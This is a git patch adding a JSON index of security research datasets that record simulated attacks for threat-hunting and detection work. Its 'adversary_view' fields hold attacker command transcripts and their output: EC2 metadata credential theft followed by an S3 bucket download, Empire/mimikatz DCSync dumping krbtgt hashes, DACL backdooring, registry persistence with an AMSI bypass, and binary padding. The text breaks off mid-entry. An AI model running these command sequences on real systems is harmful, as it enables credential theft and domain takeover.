From 171c1f5f7fc53cd4f20a84da624722d3c00ccfb3 Mon Sep 17 00:00:00 2001
From: Ian Hellen
Date: Mon, 22 Aug 2022 15:13:55 -0700
Subject: [PATCH] Adding script to generate json indexes for remote use. Adding initial index files to ./data/.index
Signed-off-by: Ian Hellen
---
datasets/.index/sec-dsets-index.json | 1 +
datasets/.index/sec-dsets-index.json.gz | Bin 0 -> 68506 bytes
datasets/.index/sec-dsets-index.json.zip | Bin 0 -> 59176 bytes
scripts/misc/create_json_index.py | 203 +++++++++++++++++++++++
4 files changed, 204 insertions(+)
create mode 100644 datasets/.index/sec-dsets-index.json
create mode 100644 datasets/.index/sec-dsets-index.json.gz
create mode 100644 datasets/.index/sec-dsets-index.json.zip
create mode 100644 scripts/misc/create_json_index.py
diff --git a/datasets/.index/sec-dsets-index.json b/datasets/.index/sec-dsets-index.json
new file mode 100644
index 00000000..c81edb9c
--- /dev/null
+++ b/datasets/.index/sec-dsets-index.json
@@ -0,0 +1 @@ +{"atomic": {"SDAWS-200914011940": {"title": "AWS Cloud Bank Breach S3", "id": "SDAWS-200914011940", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/09/13", "modification_date": "2020/09/13", "platform": ["AWS"], "type": "atomic", "tags": ["EC2 Proxy Abuse", "S3 Data Exfiltration"], "description": "This dataset represents adversaries abusing a misconfigured EC2 reverse proxy to obtain instance profile keys and eventually exfiltrate files from an S3 bucket.", "attack_mappings": [{"technique": "T1078", "sub-technique": "004", "tactics": ["TA0001", "TA0003", "TA0004", "TA0005"]}, {"technique": "T1530", "sub-technique": null, "tactics": ["TA0009"]}], "notebooks": null, "files": [{"type": "cloud", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/aws/collection/ec2_proxy_s3_exfiltration.zip"}], "simulation": {"environment": "https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3", "tools": [{"type": "Cloud Formation Templates", "name": "AWS CLI", "module": "Exfiltration", "script": "https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3"}], "permissions_required": ["user"], "adversary_view": "> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/ -H \"Host:169.254.169.254\" \nMordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 >\n\n> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 -H \"Host:169.254.169.254\"\n{\n\"Code\" : \"Success\",\n\"LastUpdated\" : \"2020-09-14T00:49:26Z\",\n\"Type\" : \"AWS-HMAC\",\n\"AccessKeyId\" : \"ASIA5FLZVX4OPVKKVBMX\",\n\"SecretAccessKey\" : \"aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03\",\n\"Token\" : \"TOKEN\",\n\"Expiration\" : \"2020-09-14T07:10:27Z\"\n}\n\n> aws configure --profile erratic\nAWS Access Key ID [None]: ASIA5FLZVX4OPVKKVBMX\nAWS Secret Access Key [None]: aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03\nDefault region name 
[None]: us-east-1\nDefault output format [None]: json\n\n> echo aws_session_token = \"TOKEN\" >> ~/.aws/credentials \n\n> aws s3 ls --profile erratic\n2020-09-13 20:00:32 mordorctstack-s3bucketforcloudtrail-1gj7vvt2ul642\n2020-09-13 19:59:59 mordors3stack-s3bucket-llp2yingx64a\n\n> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic\n2020-09-13 20:00:26 89 ring.txt\n\n> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic\n2020-09-13 20:00:26 89 ring.txt\n\n> aws s3 sync s3://mordors3stack-s3bucket-llp2yingx64a . --profile erratic \ndownload: s3://mordors3stack-s3bucket-llp2yingx64a/ring.txt to ./ring.txt"}, "references": ["https://github.com/RhinoSecurityLabs/cloudgoat/tree/master/scenarios/cloud_breach_s3"]}, "SDAWS-2202181000": {"title": "AWS S3 Honey Bucket Logs", "id": "SDAWS-2202181000", "contributors": ["Ashwin Patil @ashwinpatil"], "creation_date": "2022/02/18", "modification_date": "2022/02/18", "platform": ["AWS"], "type": "atomic", "tags": ["S3 Public Honeybucket Discovery"], "description": "This dataset represents adversaries trying to scan , discover and access open S3 honeybucket based on known hostname patterns. 
in this case honeybucket microsoft-devtest.s3.amazonaws.com.", "attack_mappings": [{"technique": "T1580", "sub-technique": null, "tactics": ["TA0007"]}], "notebooks": "https://github.com/microsoft/msticpy/blob/main/docs/notebooks/AWS_S3_HoneybucketLogAnalysis.ipynb", "files": [{"type": "cloud", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/aws/discovery/aws_s3_honeybucketlogs.zip"}], "simulation": {"environment": "https://dashboard.breachinsider.com/honey-buckets/", "permissions_required": ["user"], "adversary_view": "> pip3 install s3scanner\n\n> s3scanner --threads 8 scan --buckets-file ./bucket-names.txt >\n\n> curl -s \"microsoft-devtest.s3.amazonaws.com\"\n\n> aws s3 ls s3://microsoft-devtest.s3.amazonaws.com\n\n> echo 'Trying to write text file to open public bucket' > hello.txt\n\n> aws s3 sync hello.txt s3://microsoft-devtest.s3.amazonaws.com"}, "references": ["https://breachinsider.com/blog/honey-buckets-find-out-who-is-snooping-through-your-amazon-s3-buckets/"]}, "SDLIN-201110074812": {"title": "Arp Cache Discovery", "id": "SDLIN-201110074812", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/11/10", "modification_date": "2020/11/10", "platform": ["Linux"], "type": "atomic", "tags": null, "description": "This dataset represents a threat actor using arp to list out the arp cache.", "attack_mappings": [{"technique": "T1018", "sub-technique": null, "tactics": ["TA0007"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/linux/discovery/host/sh_arp_cache.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "sh", "module": "sh", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md#atomic-test-6---remote-system-discovery---arp-nix"}], "permissions_required": ["User"], "adversary_view": "wardog@UBUNTU5:~$ arp -a | grep -v '^?'\n_gateway 
(192.168.2.1) at 12:34:56:78:9a:bc [ether] on eth0 "}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md#atomic-test-6---remote-system-discovery---arp-nix"]}, "SDLIN-201110081941": {"title": "DD Binary Padding Hash Change", "id": "SDLIN-201110081941", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/11/10", "modification_date": "2020/11/10", "platform": ["Linux"], "type": "atomic", "tags": null, "description": "This dataset represents a threat actor using dd to add a zero to the binary to change the hash.", "attack_mappings": [{"technique": "T1027", "sub-technique": "001", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/linux/defense_evasion/host/sh_binary_padding_dd.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "sh", "module": "sh", "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md#atomic-test-1---pad-binary-to-change-hash---linuxmacos-dd"}], "permissions_required": ["User"], "adversary_view": "md5sum /tmp/psexec.py \n5aa8b93e9b40c04d6d9d0cc8cd3975ed /tmp/psexec.py\n\ndd if=/dev/zero bs=1 count=1 >> /tmp/psexec.py \n1+0 records in\n1+0 records out\n1 byte copied, 5.6002e-05 s, 17.9 kB/s\n\nmd5sum /tmp/psexec.py \nc509e5bd899de81d603da3f61e717837 /tmp/psexec.py"}, "references": ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md#atomic-test-1---pad-binary-to-change-hash---linuxmacos-dd"]}, "SDWIN-190301125905": {"title": "Empire Powerview Add-DomainObjectAcl", "id": "SDWIN-190301125905", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/03/01", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["AD Object Modification", "AD Object nTSecurityDescriptor", "LDAP ModifyRequest"], "description": 
"These datasets represent adversaries with enough permissions (i.e. domain admin) adding an access control entry (ACE) to the discretionary access control list (DACL) of an Active Directory object (i.e Root Domain). One example could be adversaries modifying the root domain DACL to allow a specific domain user, despite being in no privileged groups and not having local admin rights on the domain controller itself, to use Active Directory replication services and obtain secret domain data (i.e. Other user NTLM Hashes)", "attack_mappings": [{"technique": "T1222", "sub-technique": "001", "tactics": ["TA0005"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "Active Directory Replication User Backdoor", "link": "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190101151110.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_powerview_ldap_ntsecuritydescriptor.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/network/empire_powerview_ldap_ntsecuritydescriptor.zip"}], "simulation": {"environment": "https://github.com/OTRF/mordor-labs/tree/master/environments/windows/shire", "tools": [{"type": "C2", "name": "Empire", "module": "powerview", "script": "https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1"}], "permissions_required": ["Domain Admin"], "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nA7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http \nHBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\\sbeavers powershell 6036 5/0.0 
2020-09-18 18:15:39 http \nUF5MYK42 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 6404 5/0.0 2020-09-20 21:28:07 http \n\n8BUCWV1P ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 2488 5/0.0 2020-09-21 17:09:43 http \n\n(Empire: agents) > interact 8BUCWV1P\n(Empire: 8BUCWV1P) > scriptimport data/module_source/situational_awareness/network/powerview.ps1\n[*] Tasked 8BUCWV1P to run TASK_SCRIPT_IMPORT\n[*] Agent 8BUCWV1P tasked with task ID 1\n(Empire: 8BUCWV1P) > \nscript successfully saved in memory\n\n(Empire: 8BUCWV1P) > scriptcmd Add-DomainObjectAcl -TargetIdentity \"dc=theshire,dc=local\" -TargetDomain theshire.local -PrincipalIdentity nmartha -Rights DCSync\n[*] Tasked 8BUCWV1P to run TASK_SCRIPT_COMMAND\n[*] Agent 8BUCWV1P tasked with task ID 2\n(Empire: 8BUCWV1P) > \nJob started: 5WSPKL\n\n(Empire: 8BUCWV1P) > scriptcmd $nmarthaSid = Get-DomainUser nmartha | Select-Object -ExpandProperty objectsid; Get-DomainObjectACL \"dc=theshire,dc=local\" -Domain theshire.local -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $nmarthaSid}\n[*] Tasked 8BUCWV1P to run TASK_SCRIPT_COMMAND\n[*] Agent 8BUCWV1P tasked with task ID 3\n(Empire: 8BUCWV1P) > \nJob started: YG1ZB3\n\nAceQualifier : AccessAllowed\nObjectDN : DC=theshire,DC=local\nActiveDirectoryRights : ExtendedRight\nObjectAceType : DS-Replication-Get-Changes-In-Filtered-Set\nObjectSID : S-1-5-21-4228717743-1032521047-1810997296\nInheritanceFlags : None\nBinaryLength : 56\nAceType : AccessAllowedObject\nObjectAceFlags : ObjectAceTypePresent\nIsCallback : False\nPropagationFlags : None\nSecurityIdentifier : S-1-5-21-4228717743-1032521047-1810997296-1103\nAccessMask : 256\nAuditFlags : None\nIsInherited : False\nAceFlags : None\nInheritedObjectAceType : All\nOpaqueLength : 0\n\nAceQualifier : AccessAllowed\nObjectDN : DC=theshire,DC=local\nActiveDirectoryRights : ExtendedRight\nObjectAceType : DS-Replication-Get-Changes\nObjectSID : 
S-1-5-21-4228717743-1032521047-1810997296\nInheritanceFlags : None\nBinaryLength : 56\nAceType : AccessAllowedObject\nObjectAceFlags : ObjectAceTypePresent\nIsCallback : False\nPropagationFlags : None\nSecurityIdentifier : S-1-5-21-4228717743-1032521047-1810997296-1103\nAccessMask : 256\nAuditFlags : None\nIsInherited : False\nAceFlags : None\nInheritedObjectAceType : All\nOpaqueLength : 0\n\nAceQualifier : AccessAllowed\nObjectDN : DC=theshire,DC=local\nActiveDirectoryRights : ExtendedRight\nObjectAceType : DS-Replication-Get-Changes-All\nObjectSID : S-1-5-21-4228717743-1032521047-1810997296\nInheritanceFlags : None\nBinaryLength : 56\nAceType : AccessAllowedObject\nObjectAceFlags : ObjectAceTypePresent\nIsCallback : False\nPropagationFlags : None\nSecurityIdentifier : S-1-5-21-4228717743-1032521047-1810997296-1103\nAccessMask : 256\nAuditFlags : None\nIsInherited : False\nAceFlags : None\nInheritedObjectAceType : All\nOpaqueLength : 0"}, "references": null}, "SDWIN-190301174830": {"title": "Empire DCSync", "id": "SDWIN-190301174830", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/03/01", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["AD Replication services", "RPC DRSUAPI DsGetNCChanges"], "description": "This dataset represents adversaries abusing Active Directory Replication services to retrieve secret domain data (i.e. 
NTLM hashes) from domain accounts.", "attack_mappings": [{"technique": "T1003", "sub-technique": "006", "tactics": ["TA0006"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "Active Directory Replication From Non-Domain-Controller Accounts", "link": "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/network/empire_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "DCSync", "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/credentials/Invoke-DCSync.ps1"}], "permissions_required": ["Domain Admin"], "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\n4SUZ8X62 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 4092 5/0.0 2020-09-21 21:59:29 http \n1EHYPBVC ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 7456 5/0.0 2020-09-21 22:56:58 http \n\n(Empire: agents) > interact 1EHYPBVC\n(Empire: 1EHYPBVC) > \n(Empire: 1EHYPBVC) > usemodule credentials/mimikatz/dcsync\n(Empire: powershell/credentials/mimikatz/dcsync) > set user krbtgt\n(Empire: powershell/credentials/mimikatz/dcsync) > set domain theshire.local\n(Empire: powershell/credentials/mimikatz/dcsync) > set dc MORDORDC.theshire.local\n(Empire: powershell/credentials/mimikatz/dcsync) > info\n\n Name: Invoke-Mimikatz DCsync\n Module: powershell/credentials/mimikatz/dcsync\n NeedsAdmin: False\n 
OpsecSafe: True\n Language: powershell\nMinLanguageVersion: 2\n Background: True\n OutputExtension: None\n\nAuthors:\n @gentilkiwi\n Vincent Le Toux\n @JosephBialek\n\nDescription:\n Runs PowerSploit's Invoke-Mimikatz function to extract a\n given account password through Mimikatz's lsadump::dcsync\n module. This doesn't need code execution on a given DC, but\n needs to be run from a user context with DA equivalent\n privileges.\n\nComments:\n http://blog.gentilkiwi.com http://clymb3r.wordpress.com/\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True 1EHYPBVC Agent to run module on. \n user True krbtgt Username to extract the hash for \n (domain\\username format). \n domain False theshire.local Specified (fqdn) domain to pull for the \n primary domain/DC. \n dc False MORDORDC.theshire.local Specified (fqdn) domain controller to \n pull replication data from. \n\n(Empire: powershell/credentials/mimikatz/dcsync) > execute\n[*] Tasked 1EHYPBVC to run TASK_CMD_JOB\n[*] Agent 1EHYPBVC tasked with task ID 1\n[*] Tasked agent 1EHYPBVC to run module powershell/credentials/mimikatz/dcsync\n(Empire: powershell/credentials/mimikatz/dcsync) > \nJob started: 5PKMSU\n\nHostname: WORKSTATION5.theshire.local / S-1-5-21-4228717743-1032521047-1810997296\n\n .#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2020 20:07:46\n.## ^ ##. 
\"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ## > http://blog.gentilkiwi.com/mimikatz\n'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )\n '#####' > http://pingcastle.com / http://mysmartlogon.com ***/\n\nmimikatz(powershell) # lsadump::dcsync /user:krbtgt /domain:theshire.local /dc:MORDORDC.theshire.local\n[DC] 'theshire.local' will be the domain\n[DC] 'MORDORDC.theshire.local' will be the DC server\n[DC] 'krbtgt' will be the user account\n\nObject RDN : krbtgt\n\n** SAM ACCOUNT **\n\nSAM Username : krbtgt\nAccount Type : 30000000 ( USER_OBJECT )\nUser Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )\nAccount expiration : \nPassword last change : 9/17/2020 11:14:46 AM\nObject Security ID : S-1-5-21-4228717743-1032521047-1810997296-502\nObject Relative ID : 502\n\nCredentials:\n Hash NTLM: c2547afe54ff225a546c48805714d000\n ntlm- 0: c2547afe54ff225a546c48805714d000\n lm - 0: 376c6c28a8cfd97055be910640a24428\n\nSupplemental Credentials:\n* Primary:NTLM-Strong-NTOWF *\n Random Value : a69dcd105b2fc3955a3f52ca00a26902\n\n* Primary:Kerberos-Newer-Keys *\n Default Salt : THESHIRE.LOCALkrbtgt\n Default Iterations : 4096\n Credentials\n aes256_hmac (4096) : 2954d183aaca51936dea10ea187e198814fa57b136733ca167b5d3fcc5b6ab2a\n aes128_hmac (4096) : a8811f9942540c8f10c3837a6975d446\n des_cbc_md5 (4096) : e36d674cc7c8b983\n\n* Primary:Kerberos *\n Default Salt : THESHIRE.LOCALkrbtgt\n Credentials\n des_cbc_md5 : e36d674cc7c8b983\n\n* Packages *\n NTLM-Strong-NTOWF\n\n* Primary:WDigest *\n 01 774cc07151941eb115c0fd700fa5715b\n 02 6a75ae70376df6a3a3e23f560890ac90\n 03 cd5fa9ee1e6ab120cd6edb6970f56f38\n 04 774cc07151941eb115c0fd700fa5715b\n 05 6a75ae70376df6a3a3e23f560890ac90\n 06 168d6e12549fcbfa3931ffe79e6a978f\n 07 774cc07151941eb115c0fd700fa5715b\n 08 c2fc61fda20bbacb17fb29b10d7b8144\n 09 c2fc61fda20bbacb17fb29b10d7b8144\n 10 2985ad74f9f6f53e7533662687998542\n 11 
4f58b2e2f9e8505a4b364b5c7bb0f0c5\n 12 c2fc61fda20bbacb17fb29b10d7b8144\n 13 61c34cf9f0bb6f8062250ffff84cda07\n 14 4f58b2e2f9e8505a4b364b5c7bb0f0c5\n 15 8a1d00b5e9c900715124c0998c19b909\n 16 8a1d00b5e9c900715124c0998c19b909\n 17 da88e05b3fe5adc93f5838eb33fadb98\n 18 45d131a894f854b5400167647aa5ae0f\n 19 2a1e106ba660636a95def3aad248ca6c\n 20 c05fa8a38b50e8c9088d3a64a7659817\n 21 28c03b871631ef39fc8cbc7fbb8e52e8\n 22 28c03b871631ef39fc8cbc7fbb8e52e8\n 23 5e1dceb9c5260211633323b398af827d\n 24 e3b40de14a439d9c18c57cc60002c5f5\n 25 e3b40de14a439d9c18c57cc60002c5f5\n 26 e52cde43b834f641f9f80190b29064a7\n 27 3b2e4b4ad448b19043d422dc9bf4fadc\n 28 0c45e5c4ef958888593d806c650f0e3d\n 29 1822249537162bad7b9808ae6b51c627"}, "references": null}, "SDWIN-190319020147": {"title": "Empire Net Local Administrators Group", "id": "SDWIN-190319020147", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/03/19", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["Local Administrators Group Enumeration"], "description": "This dataset represents adversaries enumerating members of the local Administratrors group via the net.exe utility", "attack_mappings": [{"technique": "T1069", "sub-technique": "001", "tactics": ["TA0007"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/empire_shell_net_localgroup_administrators.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "shell", "script": "net localgroup Administrators"}], "permissions_required": ["User"], "adversary_view": "(Empire: 1EHYPBVC) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\n4SUZ8X62 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 4092 5/0.0 
2020-09-21 21:59:29 http \n1EHYPBVC ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 7456 5/0.0 2020-09-21 23:18:05 http \n\n(Empire: agents) > interact 1EHYPBVC\n(Empire: 1EHYPBVC) > shell net localgroup Administrators\n[*] Tasked 1EHYPBVC to run TASK_SHELL\n[*] Agent 1EHYPBVC tasked with task ID 2\n(Empire: 1EHYPBVC) > \nAlias name Administrators\nComment Administrators have complete and unrestricted access to the computer/domain\n\nMembers\n\n-------------------------------------------------------------------------------\nTHESHIRE\\Domain Admins\nwardog\nThe command completed successfully.\n\n\n..Command execution completed.\n\n(Empire: 1EHYPBVC) >"}, "references": null}, "SDWIN-190319020729": {"title": "Empire Net Local Users", "id": "SDWIN-190319020729", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/03/19", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["Local Users Enumeration"], "description": "This dataset represents adversaries enumerating all local users on an endpoint", "attack_mappings": [{"technique": "T1087", "sub-technique": "001", "tactics": ["TA0007"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/empire_shell_net_local_users.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "shell", "script": "net user"}], "permissions_required": ["User"], "adversary_view": "(Empire: 1EHYPBVC) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\n4SUZ8X62 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 4092 5/0.0 2020-09-21 21:59:29 http \n1EHYPBVC ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 7456 5/0.0 2020-09-21 23:25:39 http \n\n(Empire: agents) 
> interact 1EHYPBVC\n(Empire: 1EHYPBVC) > shell net user\n[*] Tasked 1EHYPBVC to run TASK_SHELL\n[*] Agent 1EHYPBVC tasked with task ID 3\n(Empire: 1EHYPBVC) > \nUser accounts for \\\\WORKSTATION5\n\n-------------------------------------------------------------------------------\nDefaultAccount Guest wardog \nWDAGUtilityAccount \nThe command completed successfully.\n\n..Command execution completed.\n\n(Empire: 1EHYPBVC) > "}, "references": ["https://docs.microsoft.com/en-us/windows/win32/netmgmt/user-functions"]}, "SDWIN-190319021158": {"title": "Empire Net Domain Users", "id": "SDWIN-190319021158", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/03/19", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["Domain Users Enumeration", "RPC SAMR EnumDomainUsers"], "description": "This dataset represents adversaries enumerating all users that belong to a domain via RPC SAMR EnumDomainUsers.", "attack_mappings": [{"technique": "T1087", "sub-technique": "002", "tactics": ["TA0007"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/empire_shell_samr_EnumDomainUsers.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/network/empire_shell_samr_EnumDomainUsers.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "shell", "script": null}], "permissions_required": ["User"], "adversary_view": "(Empire: 1EHYPBVC) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\n4SUZ8X62 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 4092 5/0.0 2020-09-21 21:59:29 http \n1EHYPBVC ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo 
powershell 7456 5/0.0 2020-09-21 23:25:39 http \n\n(Empire: agents) > interact 1EHYPBVC\n\n(Empire: 1EHYPBVC) > shell net user /domain\n[*] Tasked 1EHYPBVC to run TASK_SHELL\n[*] Agent 1EHYPBVC tasked with task ID 5\n(Empire: 1EHYPBVC) > \nThe request will be processed at a domain controller for domain theshire.local.\n\nUser accounts for \\\\MORDORDC.theshire.local\n\n-------------------------------------------------------------------------------\ndschrute Guest krbtgt \nlrodriguez mscott nmartha \npbeesly pgustavo sbeavers \nsysmonsvc wardog \nThe command completed successfully.\n\n..Command execution completed.\n\n(Empire: 1EHYPBVC) > "}, "references": null}, "SDWIN-190319023812": {"title": "Empire Userland Registry Run Keys", "id": "SDWIN-190319023812", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/03/19", "modification_date": "2020/09/04", "platform": ["Windows"], "type": "atomic", "tags": ["Local Registry Modification", "Registry Run Keys"], "description": "This dataset represents adversaries modifying local Run registry keys (i.e. HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run) for persistence. 
It also captures the execution of the persistence mechanism.", "attack_mappings": [{"technique": "T1547", "sub-technique": "001", "tactics": ["TA0003"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_persistence_registry_modification_run_keys_standard_user.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "Registry", "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/persistence/Persistence.psm1"}], "permissions_required": ["Standard User"], "adversary_view": "(Empire: stager/multi/launcher) > \n(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nKU86XWEL ps 172.18.39.5 WORKSTATION5 THESHIRE\\pgustavo powershell 5376 5/0.0 2020-09-04 07:02:57 http \n\n(Empire: agents) > interact KU86XWEL\n(Empire: KU86XWEL) > \n(Empire: KU86XWEL) > usemodule persistence/\nelevated/registry* misc/add_netuser misc/install_ssp* powerbreach/resolver\nelevated/rid_hijack* misc/add_sid_history* misc/memssp* userland/backdoor_lnk\nelevated/schtasks* misc/debugger* misc/skeleton_key* userland/registry\nelevated/wmi* misc/disable_machine_acct_change* powerbreach/deaduser userland/schtasks\nelevated/wmi_updater* misc/get_ssps powerbreach/eventlog* \n(Empire: KU86XWEL) > usemodule persistence/userland/registry\n(Empire: powershell/persistence/userland/registry) > info\n\n Name: Invoke-Registry\n Module: powershell/persistence/userland/registry\n NeedsAdmin: False\n OpsecSafe: False\n Language: powershell\nMinLanguageVersion: 2\n Background: False\n OutputExtension: None\n\nAuthors:\n @mattifestation\n @harmj0y\n @enigma0x3\n\nDescription:\n Persist a stager (or script) via the\n 
HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run registry\n key. This has an easy detection/removal rating.\n\nComments:\n https://github.com/mattifestation/PowerSploit/blob/master/Pe\n rsistence/Persistence.psm1\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True KU86XWEL Agent to run module on. \n Listener False Listener to use. \n Obfuscate False False Switch. Obfuscate the launcher \n powershell code, uses the \n ObfuscateCommand for obfuscation types. \n For powershell only. \n ObfuscateCommand False Token\\All\\1 The Invoke-Obfuscation command to use. \n Only used if Obfuscate switch is True. \n For powershell only. \n AMSIBypass False True Include mattifestation's AMSI Bypass in \n the stager code. \n AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in \n the stager code. \n KeyName True Updater Key name for the run trigger. \n RegPath False HKCU:Software\\Microsoft\\ Registry location to store the script \n Windows\\CurrentVersion\\D code. Last element is the key name. \n ebug \n ADSPath False Alternate-data-stream location to store \n the script code. \n EventLogID False Store the script in the Application \n event log under the specified EventID. \n The ID needs to be unique/rare! \n ExtFile False Use an external file for the payload \n instead of a stager. \n Cleanup False Switch. Cleanup the trigger and any \n script from specified location. \n UserAgent False default User-agent string to use for the staging\n request (default, none, or other). \n Proxy False default Proxy to use for request (default, none,\n or other). \n ProxyCreds False default Proxy credentials \n ([domain\\]username:password) to use for \n request (default, none, or other). \n\n(Empire: powershell/persistence/userland/registry) > set Listener http\n(Empire: powershell/persistence/userland/registry) > execute\n[>] Module is not opsec safe, run? 
